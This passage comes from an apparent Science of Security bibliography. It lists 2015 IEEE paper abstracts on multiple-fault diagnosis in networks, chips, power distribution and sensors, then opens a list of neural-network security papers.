Abstract: Network management includes several operations that aim to maximize Fault, Configuration, Account, Performance and Security (FCAPS) goals. Performance improvement often relies on multiple criteria, leading to NP-Hard optimisation problems. Very often, optimization mechanisms are narrowed to a specific scenario or present deployment issues due to their associated complexity. Others, despite reducing complexity, have accuracy issues that lead to the selection of non-optimal solutions. MeTHODICAL is an accurate optimisation technique for path selection in multihoming scenarios that enhances network management FCAPS goals by being flexible enough to operate on distinct scenarios, supporting different applications and services and with reduced deployment complexity.

Keywords: communication complexity; fault diagnosis; optimisation; performance evaluation; telecommunication network management; telecommunication security; FCAPS goal; NP-hard optimisation problem; deployment complexity; fault configuration account performance and security goal; multihoming aware optimization mechanism; multihoming scenario; network management; path selection; performance improvement; Accuracy; Codecs; NP-hard problem; Optimization; Resilience; Servers; FCAPS; Multihoming; optimization; resilience (ID#: 16-9216)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140437&isnumber=7140257

 

Marijan, D., "Multi-perspective Regression Test Prioritization for Time-Constrained Environments," in Software Quality, Reliability and Security (QRS), 2015 IEEE International Conference on, pp. 157-162, 3-5 Aug. 2015. doi: 10.1109/QRS.2015.31

Abstract: Test case prioritization techniques are widely used to enable reaching certain performance goals during regression testing faster. A commonly used goal is high fault detection rate, where test cases are ordered in a way that enables detecting faults faster. However, for optimal regression testing, there is a need to take into account multiple performance indicators, as considered by different project stakeholders. In this paper, we introduce a new optimal multi-perspective approach for regression test case prioritization. The approach is designed to optimize regression testing for faster fault detection integrating three different perspectives: business perspective, performance perspective, and technical perspective. The approach has been validated in regression testing of industrial mobile device systems developed in continuous integration. The results show that our proposed framework efficiently prioritizes test cases for faster and more efficient regression fault detection, maximizing the number of executed test cases with high failure frequency, high failure impact, and cross-functional coverage, compared to manual practice.

Keywords: fault diagnosis; program testing; regression analysis; business perspective; continuous integration; cross-functional coverage; failure frequency; failure impact; fault detection rate; industrial mobile device system; multiperspective regression test prioritization; optimal multiperspective approach; optimal regression testing; performance indicator; performance perspective; regression fault detection; regression test case prioritization; technical perspective; test case prioritization technique; time-constrained environment; Business; Fault detection; Manuals; Software; Testing; Time factors; Time-frequency analysis; regression testing; software testing; test case prioritization (ID#: 16-9217)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7272927&isnumber=7272893

 

Pomeranz, I., "Improving the Accuracy of Defect Diagnosis with Multiple Sets of Candidate Faults," in Computers, IEEE Transactions on, vol PP, no. 99, pp.1-1, 2015. doi: 10.1109/TC.2015.2468234

Abstract: Given a chip that produced a faulty output response to a test set, a defect diagnosis procedure produces a set of candidate faults that is expected to identify the defects that are present in the chip. The accuracy of the set of candidate faults is higher when the set is smaller or when its overlap with the defects that are present in the chip is larger. To increase the accuracy of a set of candidate faults, this paper describes an approach where several sets of candidate faults are computed based on different subsets of the test set. The subsets are obtained by removing small numbers of tests from the complete test set. The result is sets of candidate faults that are similar but not identical. The number of sets where a fault appears yields a confidence level that the fault actually belongs in a set of candidate faults. New sets of candidate faults are defined based on the confidence levels obtained. The smallest set of candidate faults can be used as the final result of defect diagnosis, or the sets can be used for ranking the candidates. Experimental results for benchmark circuits demonstrate the effectiveness of this approach.

Keywords: Accuracy; Benchmark testing; Circuit faults; Computational modeling; Failure analysis; Fault diagnosis; Integrated circuit modeling; Candidate faults; defect diagnosis; failure analysis; testing; transition faults (ID#: 16-9218)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7194771&isnumber=4358213

 

Zhao, C.; Gao, F., "Fault Subspace Selection Approach Combined With Analysis of Relative Changes for Reconstruction Modeling and Multifault Diagnosis," in Control Systems Technology, IEEE Transactions on, vol. PP, no. 99, pp.1-12, 2015. doi: 10.1109/TCST.2015.2464331

Abstract: Online fault diagnosis has been a crucial task for industrial processes, which in general is taken after some abnormalities have been detected. Reconstruction-based fault diagnosis has been drawing special attention as a good alternative to the traditional contribution plot. It identifies the fault cause by finding the specific reconstruction model (i.e., fault subspace) that can well eliminate alarm signals from a bunch of alternatives that have been prepared based on historical fault data. However, in practice, the abnormality may result from the joint effects of multiple faults, which thus cannot be well corrected by single-fault subspace archived in the historical fault library. In this paper, an aggregative reconstruction-based fault diagnosis strategy is proposed to handle the case where multiple-fault causes jointly contribute to the abnormal process behaviors. First, fault subspaces are extracted based on historical fault data in two different monitoring subspaces where analysis of relative changes is taken to enclose the major fault effects that are responsible for different alarm monitoring statistics. Then, a fault subspace selection strategy is developed to analyze the combinatorial fault nature that will sort and select the informative fault subspaces by evaluating their significances in data correction. Finally, an aggregative fault subspace is calculated by combining the selected fault subspaces, which represents the joint effects from multiple faults and works as the final reconstruction model for online fault diagnosis. Theoretical support is framed and the related statistical characteristics are analyzed. Its feasibility and performance are illustrated with simulated multiple faults from the Tennessee Eastman benchmark process.

Keywords: Correlation; Data models; Fault diagnosis; Joints; Libraries; Monitoring; Principal component analysis; Analysis of relative changes; fault subspace selection; joint fault effects; multifault (MF) diagnosis; reconstruction modeling (ID#: 16-9219)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7295568&isnumber=4389040

 

Bahadorinejad, A.; Braga-Neto, U., "Optimal Fault Detection and Diagnosis in Transcriptional Circuits using Next-Generation Sequencing," in Computational Biology and Bioinformatics, IEEE/ACM Transactions on  vol. PP, no. 99, pp.1-1, 2015. doi: 10.1109/TCBB.2015.2404819

Abstract: We propose a methodology for model-based fault detection and diagnosis for stochastic Boolean dynamical systems indirectly observed through a single time series of transcriptomic measurements using Next Generation Sequencing (NGS) data. The fault detection consists of an innovations filter followed by a fault certification step, and requires no knowledge about the system faults. The innovations filter uses the optimal Boolean state estimator, called the Boolean Kalman Filter (BKF). In the presence of knowledge about the possible system faults, we propose an additional step of fault diagnosis based on a multiple model adaptive estimation (MMAE) method consisting of a bank of BKFs running in parallel. Performance is assessed by means of false detection and misdiagnosis rates, as well as average times until correct detection and diagnosis. The efficacy of the proposed methodology is demonstrated via numerical experiments using a p53-MDM2 negative feedback loop Boolean network with stuck-at faults that model molecular events commonly found in cancer.

Keywords: Bioinformatics; Computational biology; DNA; Fault detection; IEEE transactions; Technological innovation; Vectors; Boolean Kalman Filter; Boolean Networks; Fault Detection and Diagnosis; Next Generation Sequencing; Optimal Estimation (ID#: 16-9220)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7045509&isnumber=4359833

 

Zhou, J.; Chen, Z.; Wang, J.; Zheng, Z.; Lyu, M.R., "A Data Set for User Request Trace-Oriented Monitoring and its Applications," in Services Computing, IEEE Transactions on, vol. PP, no. 99, pp.1-1, 2015. doi: 10.1109/TSC.2015.2491286

Abstract: User request trace-oriented monitoring is an effective method to improve the reliability of cloud services. However, there are some difficulties in getting useful traces in practice, which hinder the development of trace-oriented monitoring research. In this paper, we release a fine-grained user request-centric open trace data set, called TraceBench, which is collected in a real-world cloud storage service deployed in a real environment. When collecting, we consider different scenarios, involving multiple scales of clusters, different kinds of user requests, various speeds of workloads, many types of injected faults, etc. To validate the usability and authenticity, we have employed TraceBench in several trace-oriented monitoring topics, such as anomaly detection, performance problem diagnosis, and temporal invariant mining. The results show that TraceBench well supports these research topics. In addition, we have also carried out an extensive data analysis based on TraceBench, which validates the high quality of the data set.

Keywords: Cloud computing; Data mining; IP networks; Instruments; Monitoring; Reliability; Servers; anomaly detection; cloud services; data set; end-to-end tracing; trace-oriented monitoring (ID#: 16-9221)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299324&isnumber=4629387

 

Jiang, Y.; Liu, C.-C.; Diedesch, M.; Lee, E.; Srivastava, A.K., "Outage Management of Distribution Systems Incorporating Information From Smart Meters," in Power Systems, IEEE Transactions on, vol. PP, no. 99, pp.1-11, 2015. doi: 10.1109/TPWRS.2015.2503341

Abstract: A critical function in outage management for distribution systems is to quickly detect a fault and identify the activated protective device(s). With ongoing smart grid development, numerous smart meters and fault indicators with communication capabilities provide an opportunity for accurate and efficient outage management. Using the available data, this paper proposes a new multiple-hypothesis method for identification of the faulted section on a feeder or lateral. Credibility of the multiple hypotheses is determined using the available evidence from these devices. The proposed methodology is able to handle i) multiple faults, ii) protection miscoordination, and iii) missing outage reports from smart meters and fault indicators. For each hypothesis, an optimization method based on integer programming is proposed to determine the most credible actuated protective device(s) and faulted line section(s). Simulation results based on the distribution feeders of Avista Utilities serving Pullman, WA, validate the effectiveness of the proposed approach.

Keywords: Automation; Fault location; Fuses; Smart meters; Substations; Topology; Distribution automation; fault diagnosis; fault indicator; multiple hypotheses; outage management; smart meter (ID#: 16-9222)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7352376&isnumber=4374138

 

Wang, H.; Yang, G.; Ye, D., "Fault Detection and Isolation for Affine Fuzzy Systems with Sensor Faults," in Fuzzy Systems, IEEE Transactions on, vol. PP, no. 99, pp.1-1, 2015. doi: 10.1109/TFUZZ.2015.2501414

Abstract: This paper investigates the fault detection and isolation (FDI) problem for a class of nonlinear systems with sensor outage faults. The considered nonlinear systems are described as affine fuzzy models, and the system outputs are chosen as the premise variables of fuzzy models. Different from the existing results, the influence of sensor faults on premise variables is considered. As a result, the well-known parallel distributed compensation (PDC) scheme cannot be used for FDI filters design. By using the structural information encoded in the fuzzy rules, the affine fuzzy system is represented by multiple operating-regime-based models in fault-free case and faulty cases. In the multiple-model scheme, a bank of piecewise FDI filters are constructed, each of them is based on the affine fuzzy model that describes the system in the presence of a specified fault. The fault-dependent residual signals generated from the filters are used for detecting and isolating the specified fault. The FDI filter design conditions are obtained in the formulation of linear matrix inequalities (LMIs). Finally, a numerical example is given to illustrate the effectiveness and merits of the proposed method.

Keywords: Control systems; Fault detection; Fault diagnosis; Fuzzy systems; Indexes; Interpolation; Nonlinear systems; Affine fuzzy systems; fault detection and isolation; linear matrix inequalities; sensor outage faults (ID#: 16-9223)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7331302&isnumber=4358784

 

Pourbabaee, B.; Meskin, N.; Khorasani, K., "Sensor Fault Detection, Isolation, and Identification Using Multiple-Model-Based Hybrid Kalman Filter for Gas Turbine Engines," in Control Systems Technology, IEEE Transactions on, vol. PP, no. 99, pp.1-17, 2015. doi: 10.1109/TCST.2015.2480003

Abstract: In this paper, a novel sensor fault detection, isolation, and identification (FDII) strategy is proposed using the multiple-model (MM) approach. The scheme is based on multiple hybrid Kalman filters (MHKFs), which represents an integration of a nonlinear mathematical model of the system with a number of piecewise linear (PWL) models. The proposed fault detection and isolation (FDI) scheme is capable of detecting and isolating sensor faults during the entire operational regime of the system by interpolating the PWL models using a Bayesian approach. Moreover, the proposed MHKF-based FDI scheme is extended to identify the magnitude of a sensor fault using a modified generalized likelihood ratio method that relies on the healthy operational mode of the system. To illustrate the capabilities of our proposed FDII methodology, extensive simulation studies are conducted for a nonlinear gas turbine engine. Various single and concurrent sensor fault scenarios are considered to demonstrate the effectiveness of our proposed online hierarchical MHKF-based FDII scheme under different flight modes. Finally, our proposed hybrid Kalman filter (HKF)-based FDI approach is compared with various filtering methods such as the linear, extended, unscented, and cubature Kalman filters corresponding to both interacting and noninteracting MM-based schemes. Our comparative studies confirm the superiority of our proposed HKF method in terms of promptness of the fault detection, lower false alarm rates, as well as robustness with respect to the engine health parameter degradations.

Keywords: Degradation; Engines; Fault detection; Kalman filters; Monitoring; Robustness; Turbines; Fault diagnosis; Gas turbine engines; Generalized likelihood ratio; Hybrid Kalman filter; Multiple model-based approach; Piecewise linear models interpolation (ID#: 16-9224)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7298424&isnumber=4389040

 

Xiaoqin, Liu; Zewei, Dong; Hongdong, Qu; Limei, Song, "Dynamic Multiple Fault Diagnosis Based on HMM and BPSO," in Instrumentation and Measurement, Computer, Communication and Control (IMCCC), 2015 Fifth International Conference on, pp. 186-191, 18-20 Sept. 2015. doi: 10.1109/IMCCC.2015.46

Abstract: For systems needed short diagnosis delay, dynamic multiple faults diagnosis (DMFD) is put forward for the systems of demanding diagnosis quickly. In this paper, a method of DMFD based Hidden Markov Mode (HMM) is established for the system's inner states transform and the corresponding external observing sequence, thus the inner states transform could be recovered from the external observing sequence with the decoding algorithm of HMM, which belongs to NP completeness problems. This paper decomposes original DMFD problem into several separable sub problems, and solves each of them with binary particle swarm optimization algorithm (BPSO). It is shown from the application examples that the system's real-time health status could be evaluated at a high correct ratio with this method.

Keywords: Computers; Fault diagnosis; Heuristic algorithms; Hidden Markov models; Linear programming; Markov processes; Particle swarm optimization; BPSO; Hidden Markov Model; dynamic multiple fault diagnosis (ID#: 16-9225)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7405825&isnumber=7405778

 

Tanwir, S.; Prabhu, S.; Hsiao, M.; Lingappan, L., "Information-Theoretic and Statistical Methods of Failure Log Selection for Improved Diagnosis," in Test Conference (ITC), 2015 IEEE International, pp. 1-10, 6-8 Oct. 2015. doi: 10.1109/TEST.2015.7342381

Abstract: Diagnosis of each failed part requires the failed data captured on the test equipment. However, due to memory limitations on the tester, one often cannot store all the failed data for every chip tested. Consequently, truncated failure logs are used instead of complete logs for each part. Such truncation of the failure logs can result in very long turn-around times for diagnosis because important failure points may be removed from the log. Subsequently, the accuracy and resolution of final diagnosis may suffer even after multiple iterations of diagnosis. In addition, the existing test response compaction techniques though good for testing, either adversely affect diagnosis or are highly sensitive to deviation from the chosen fault model. In this context, the industry needs dynamic selection of better failure logs that enhances diagnosis. In this paper, we propose a number of metrics based on information theory that may help in selecting failure logs dynamically for improving the accuracy and resolution of final diagnosis. We also report on the efficacy of these metrics through the results of our experiments.

Keywords: failure analysis; fault diagnosis; information theory; iterative methods; microprocessor chips; statistical analysis; every tested chip; failed data; failure log selection; final diagnosis; improved diagnosis; information-theoretic methods; memory limitations; multiple diagnosis iterations; statistical methods; test equipment; test response compaction; truncated failure logs; Circuit faults; Compaction; Industries; Integrated circuit modeling; Measurement; Real-time systems; Testing (ID#: 16-9226)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7342381&isnumber=7342364

 

Jie Zhang; Ming Lyu; Xianfeng Li; Jiping Zheng, "Fault Detection for Networked Control System with Multiple Communication Delays and Multiple Missing Measurements," in Networking, Sensing and Control (ICNSC), 2015 IEEE 12th International Conference on, pp. 580-585, 9-11 April 2015. doi: 10.1109/ICNSC.2015.7116102

Abstract: This paper is concerned with fault detection problem for a class of Networked Control Systems (NCSs) with both multiple Communication Delays and multiple missing measurements. In this paper we build up a fault detection filter through a model of NCS, so that the overall fault detection dynamics is exponentially stable in the mean square, besides the error between the residual signal and the fault signal is made as small as possible. Sufficient conditions are first established for the existence of the desired fault detection filters, and then, the corresponding solvability conditions for the desired filter gains are established. At the end of this title, a simulation example was given to demonstrate the effectiveness of the proposed method.

Keywords: asymptotic stability; delays; fault diagnosis; networked control systems; NCS; exponential stability; fault detection; multiple communication delays; multiple missing measurements; networked control system; sufficient conditions; Delays; Electronic mail; Fault detection; Loss measurement; Networked control systems; Noise; Random variables (ID#: 16-9227)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116102&isnumber=7115994

 

Timotheou, S.; Panayiotou, C.; Polycarpou, M., "Fault-Adaptive Traffic Density Estimation for the Asymmetric Cell Transmission Model," in Intelligent Transportation Systems (ITSC), 2015 IEEE 18th International Conference on, pp. 2855-2860, 15-18 Sept. 2015. doi: 10.1109/ITSC.2015.459

Abstract: The often faulty nature of measurement sensors hinders reliable traffic state estimation, affecting in this way various transportation operations such as traffic control and in-car navigation. This work proposes a systematic, model-based, online and network-wide approach to achieve robust and good quality state estimation in the presence of sensor faults. The approach is comprised of three stages aiming at 1) identifying the level of faulty behavior of each sensor using a novel fault-tolerant optimization algorithm, 2) isolating faults, and 3) improving state estimation performance by adaptively compensating sensor faults and resolving the state estimation problem. The approach is examined in the context of the Asymmetric Cell Transmission Model for freeway traffic density estimation. Simulation results demonstrate the effectiveness of the proposed fault-adaptive approach, yielding estimation performance very close to the one obtained with healthy measurements, irrespective of the fault magnitude. It is further illustrated that the developed fault-tolerant optimization algorithm can simultaneously identify different types of faults from multiple sensors.

Keywords: estimation theory; fault diagnosis fault tolerant control; optimisation; road traffic control; state estimation; asymmetric cell transmission model; fault magnitude; fault-adaptive approach; fault-adaptive traffic density estimation; fault-tolerant optimization algorithm; faulty behavior; freeway traffic density estimation; healthy measurement; in-car navigation; isolating fault; measurement sensor; quality state estimation; sensor fault; state estimation performance; state estimation problem; traffic control; traffic state estimation; transportation operation; Fault detection; Fault tolerance; Noise; Noise measurement; Sensors; State estimation (ID#: 16-9228)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7313551&isnumber=7312804

 

Kumar, T.N.; Almurib, H.A.F.; Lombardi, F., "Operational Fault Detection and Monitoring of a Memristor-Based LUT," in Design, Automation & Test in Europe Conference & Exhibition (DATE), 2015, pp.429-434, 9-13 March 2015. Doi:  (not provided)

Abstract: This paper presents a method for operational testing of a memristor-based memory look-up table (LUT). In the proposed method, the deterioration of the memristors (as storage elements of a LUT) is modeled based on the reduction of the resistance range as observed in fabricated devices and recently reported in the technical literature. A quiescent current technique is used for testing the memristors when deterioration results in a change of state, thus leading to an erroneous (faulty) operation. An equivalent circuit model of the operational deterioration for a memristor-based LUT is presented. In addition to modeling and testing, the proposed method can be utilized also for continuous monitoring of the LUT in the presence of memristor deterioration in the LUT. The proposed method is assessed using LTSPICE; extensive simulation results are presented with respect to different operational features, such as LUT dimension and range of resistance. These results show that the proposed test method is scalable with LUT dimension and highly efficient for testing and monitoring a LUT in the presence of deteriorating multiple memristors.

Keywords: SPICE; equivalent circuits; fault diagnosis; memristors; table lookup; LTSPICE; change of state; device fabrication equivalent circuit model; memristor operational deterioration; memristor-based LUT dimension; memristor-based memory lookup table; operational fault detection; operational fault monitoring; operational testing; quiescent current technique; resistance range reduction; technical literature; Circuit faults; Current measurement; Electrical resistance measurement; Memristors; Resistance; Table lookup; Testing; Memristor; deterioration; monitoring; quiescent current ;testing (ID#: 16-9229)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092428&isnumber=7092347

 

Wyzga, A.; Gruca, J.; Polit, A.; Papafotiou, G., "The Load Current Sensing Method in the Multiple Output High Insulation Voltage Transformer," in Power Electronics and Applications (EPE'15 ECCE-Europe), 2015 17th European Conference on, pp. 1-8, 8-10 Sept. 2015. doi: 10.1109/EPE.2015.7309100

Abstract: Some power supplies do not require accurate current feedback to function properly. In many cases the information about the output current is only needed to make sure that the power supply is not overloaded. This paper describes a sensing method of individual secondary currents of a four channel power supply built using a single core transformer, by sensing the currents flowing in separate primary windings. Each secondary current could be sensed on the primary side of the high insulation voltage transformer with sufficient accuracy to assure proper fault handling strategy for the power supply.

Keywords: electric sensing devices; fault diagnosis; power supplies to apparatus; power transformer insulation; transformer cores; transformer windings; fault handling strategy; four channel power supply; load current sensing method; multiple output high insulation voltage transformer; primary winding; secondary current; single core transformer; Couplings; Insulation; Magnetic resonance; Power supplies; Power transformer insulation; Sensors; Windings; breakdown; circuits; converter control; current sensor; fault handling strategy; insulation; load sharing control; measurement; power supply (ID#: 16-9230)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7309100&isnumber=7309048

 

Indhumathi, C.; Vasantha Rani, S.P.J., "A Fuzzy Based Fault Type Detector for Remote Fault Diagnosis of Distribution Feeders," in Signal Processing, Communication and Networking (ICSCN), 2015 3rd International Conference on, pp. 1-5, 26-28 March 2015. doi: 10.1109/ICSCN.2015.7219832

Abstract: Increasing energy demands has led to expansion of power infrastructure which also means that there is an increase in the number of lines subjected to faults due to short circuits or unintentional causes such as birds, falling of branches, etc,. Sometimes this causes an outage of power. Identification of the right fault type is necessary for quick power restoration. Hence accurate fault classification in power distribution substation is essential. The work presented in the paper aims to automate the fault type identification process using a fuzzy based algorithm thereby reducing the time required for power restoration. The experimental results indicate that the algorithm accurately detects the type of fault in single and multiple fault scenarios.

 Keywords: fault diagnosis; fuzzy logic; power distribution faults; power distribution reliability; power engineering computing; power system restoration; short-circuit currents; substations; distribution feeder; fault Identification; fault classification; fuzzy based fault type detector; multiple fault scenario; power distribution substation; power infrastructure expansion; power outage; power restoration; remote fault diagnosis; short-circuit current; Analytical models; Current measurement; Fault diagnosis; Substations; Training; Distribution substation Reliability; Faults in power system; Fuzzy Logic (ID#: 16-9231)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219832&isnumber=7219823


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Neural Networks 2015

 

 
SoS Logo

Neural Networks 2015

 

Artificial neural networks have been used to solve a wide variety of tasks that are hard to solve using ordinary rule-based programming.  What has attracted much interest in neural networks is the possibility of learning.  Tasks such as function approximation, classification pattern and sequence recognition, anomaly detection, filtering, clustering, blind source separation and compression and controls all have security implications. For the Science of Security community, neural network research is related to metrics, resilience, and privacy. The work cited here was presented in 2015.


Sagar, V.; Kumar, K., "A symmetric key cryptography using genetic algorithm and error back propagation neural network," in Computing for Sustainable Global Development (INDIACom), 2015 2nd International Conference on, pp. 1386-1391, 11-13 March 2015

Abstract: In conventional security mechanism, cryptography is a process of information and data hiding from unauthorized access. It offers the unique possibility of certifiably secure data transmission among users at different remote locations. Cryptography is used to achieve availability, privacy and integrity over different networks. Usually, there are two categories of cryptography i.e. symmetric and asymmetric. In this paper, we have proposed a new symmetric key algorithm based on genetic algorithm (GA) and error back propagation neural network (EBP-NN). Genetic algorithm has been used for encryption and neural network has been used for decryption process. Consequently, this paper proposes an easy cryptographic secure algorithm for communication over the public computer networks.

 keywords: backpropagation;computer network security;cryptography;genetic algorithms;neural nets;EBP-NN;GA;certifiably secure data transmission;cryptographic secure algorithm;data hiding;data integrity;data privacy;decryption process;error back propagation neural network;genetic algorithm;information hiding;public computer networks;remote locations;symmetric key cryptography;unauthorized access;Artificial neural networks;Encryption;Genetic algorithms;Neurons;Receivers;cryptography;error back propagation neural network;genetic algorithm;symmetric key (ID#: 16-9253)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7100476&isnumber=7100186

 

Sujatha, K.; Nageswara Rao, P.V.; Rao, A.A.; Prasad, K.R.; Deepthi, M.S.B., "Biometric Identity Verification using Automatic Speaker Recognition," in Electrical, Electronics, Signals, Communication and Optimization (EESCO), 2015 International Conference on, pp. 1-5, 24-25 Jan. 2015. doi: 10.1109/EESCO.2015.7253813

Abstract: Password based Security Systems have to provide Authentication and Privacy. Strong privacy protected and high security authentication System design remains as an open problem because of the weak passwords. The fundamental problem in normal text-based passwords is that weak passwords are vulnerable to attacks and strong passwords creating problem for the user as he has to remember them with difficulty. Biometric features like passwords uttered by speakers are well suited for authentication, as this cannot be stolen or recreated and is unique to each individual. Biometric Identity Verification using Automatic Speaker Recognition is the neural network based process of automatically recognizing the user from a recording, using the text-dependent password uttered by speech. Here, Biometric identity verification is the speech that can be used to either accept or reject the identity claimed by a given user. Text supports user to remember the password when he forgets and also even when revealed to others it does not harm the system as it takes only voice password from authorized user. Voice is considered a valuable biometric feature which depends on the specific person's speaking style and physical attributes, and also it is very easy to collect and process speech data. The capacity of proposed security framework is to have a framework that will just open after perceiving a voice secret word talked by the watchword holder utilizing an Artificial Neural Network.

keywords: biometrics (access control);neural nets;speaker recognition;artificial neural network;automatic speaker recognition;biometric identity verification;password based security systems;Authentication;Biological system modeling;Mel frequency cepstral coefficient;Speaker recognition;Speech;Speech recognition;Artificial Neural Network (ANN);Automatic Speaker Recognition (ASR);Biometric Identity Verification (BIV) (ID#: 16-9254)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7253813&isnumber=7253613

 

Ashwin Kumar, T.K.; Hong Liu; Thomas, J.P.; Mylavarapu, G., "Identifying Sensitive Data Items within Hadoop," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1308-1313, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.293

Abstract: Recent growth in big-data is raising security and privacy concerns. Organizations that collect data from various sources are at a risk of legal or business liabilities due to security breach and exposure of sensitive information. Only file-level access control is feasible in current Hadoop implementation and the sensitive information can only be identified manually or from the information provided by the data owner. The problem of identifying sensitive information manually gets complicated due to different types of data. When sensitive information is accessed by an unauthorized user or misused by an authorized person, they can compromise privacy. This paper is the first part of our intended access control framework for Hadoop and it automates the process of identifying sensitive data items manually. To identify such data items, the proposed framework harnesses data context, usage patterns and data provenance. In addition to this the proposed framework can also keep track of the data lineage.

keywords: Big Data;authorisation;data handling;data privacy;parallel processing;Big-Data;Hadoop;access control framework;authorized person;business liabilities;data collection;data context;data lineage;data privacy;data provenance;data security;file-level access control;information misuse;legal liabilities;security breach;sensitive data item identification;sensitive information access;sensitive information exposure;sensitive information identification;unauthorized user;usage patterns;Access control;Context;Electromyography;Generators;Metadata;Neural networks;Sensitivity;Hadoop;data context;data lineage;data provenance;file-level access control;privacy;sensitive information;usage patterns (ID#: 16-9255)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336348&isnumber=7336120

 

Randazzo, F.; Croce, D.; Tinnirello, I.; Barcellona, C.; Merani, M.L., "Experimental evaluation of privacy-preserving aggregation schemes on planetlab," in Wireless Communications and Mobile Computing Conference (IWCMC), 2015 International, pp. 379-384, 24-28 Aug. 2015. doi: 10.1109/IWCMC.2015.7289113

Abstract: New pervasive technologies often reveal many sensitive information about users' habits, seriously compromising the privacy and sometimes even the personal security of people. To cope with this problem, researchers have developed the idea of privacy-preserving data mining which refers to the possibility of releasing aggregate information about the data provided by multiple users, without any information leakage about individual data. These techniques have different privacy levels and communication costs, but all of them can suffer when some users' data becomes inaccessible during the operation of the privacy preserving protocols. It is thus interesting to validate the applicability of such architectures in real-world scenarios. In this paper we experimentally evaluate two promising privac-preserving techniques on PlanetLab, analyzing the execution time and the failure rate that each scheme exhibits.

keywords: data mining;data privacy;ubiquitous computing;PlanetLab;communication costs;pervasive technologies;privacy preserving protocols;privacy-preserving aggregation schemes;privacy-preserving data mining;Artificial neural networks;Cryptography;Data privacy;Peer-to-peer computing;Protocols;Servers;data mining;privacy;secret sharing;secure multi-party computation (ID#: 16-9256)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7289113&isnumber=7288920

 

Beiye Liu; Chunpeng Wu; Hai Li; Yiran Chen; Qing Wu; Barnell, M.; Qinru Qiu, "Cloning your mind: Security challenges in cognitive system designs and their solutions," in Design Automation Conference (DAC), 2015 52nd ACM/EDAC/IEEE, pp. 1-5, 8-12 June 2015. doi: 10.1145/2744769.2747915

Abstract: With the booming of big-data applications, cognitive information processing systems that leverage advanced data processing technologies, e.g., machine learning and data mining, are widely used in many industry fields. Although these technologies demonstrate great processing capability and accuracy in the relevant applications, several security and safety challenges are also emerging against these learning based technologies. In this paper, we will first introduce several security concerns in cognitive system designs. Some real examples are then used to demonstrate how the attackers can potentially access the confidential user data, replicate a sensitive data processing model without being granted the access to the details of the model, and obtain some key features of the training data by using the services publically accessible to a normal user. Based on the analysis of these security challenges, we also discuss several possible solutions that can protect the information privacy and security of cognitive systems during different stages of the usage.

keywords: Big Data;cognition;security of data;Big-Data application;cognitive information processing systems;cognitive system design;data mining;data security;machine learning;sensitive data processing model;Data models;Neural networks;Predictive models;Security;Training;Training data;Cognitive Systems;Machine Learning;Security (ID#: 16-9257)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167279&isnumber=7167177

 

[Title page]," in Futuristic Trends on Computational Analysis and Knowledge Management (ABLAZE), 2015 International Conference on, pp. 1-1, 25-27 Feb. 2015. doi: 10.1109/ABLAZE.2015.7155050

Abstract: The following topics are dealt with: vibration signal based monitoring; mechanical microdrilling; rule based inflectional urdu stemmer usal; rule based derivational urdu stemmer usal; fuzzy logic controller; heat exchanger temperature process; text dependent speaker recognition; MFCC; SBC; multikeyword based sorted querying; encrypted cloud data; communication understandability enhancement; GSD; parsing; input power quality; switched reluctance motor drive; externally powered upper limb prostheses; program test data generation; launch vehicle optimal trajectory generation; misalignment fault detection; induction motors; current signature analysis; vibration signature analysis; wind power plants; vortex induced vibration; mechanical structure modal analysis; machining parameter optimization; diesel engines; high speed nonvolatile NEMS memory devices; image fusion; RGB color space; LUV color space; offline English character recognition; human skin detection; tumor boundary extraction; MR images; OdiaBraille; text transcription; shadow detection; YIQ color models; color aerial images; moving object segmentation; image data deduplication; iris recognition; two-stage series connected thermoelectric generator; education information system; cyclone separator CFD simulation; imperfect debugging; vulnerability discovery model; stochastic differential equation; cloud data access; attribute based encryption; agile SCRUM framework; PID controller optimisation; hybrid watermarking technique; privacy preservation; vertical partitioned medical database; power amplifier; software reliability growth modeling; cochlear implantation; cellular towers; feedforward neural networks; MBSOM; agent based semantic ontology matching; phonetic word identification; test case selection; MANET security issues; online movie data classification; modified LEACH protocol; mobile ad hoc networks; virtual machine introspection; task scheduling; cluster computing; image compression; green cloud computin- ; critical health data transmission system; irreversible regenerative Brayton cycle; task set based adaptive round robin scheduling; database security; heterogeneous online social networks; aspect oriented systems; IP network; MPLS network; DBSCAN algorithm; VANET; self-organizing feature map; image segmentation; enzyme classification; wireless sensor networks; energy smart routing protocol; adaptive gateway discovery mechanism; heuristic job scheduling; AODV based congestion control protocol; 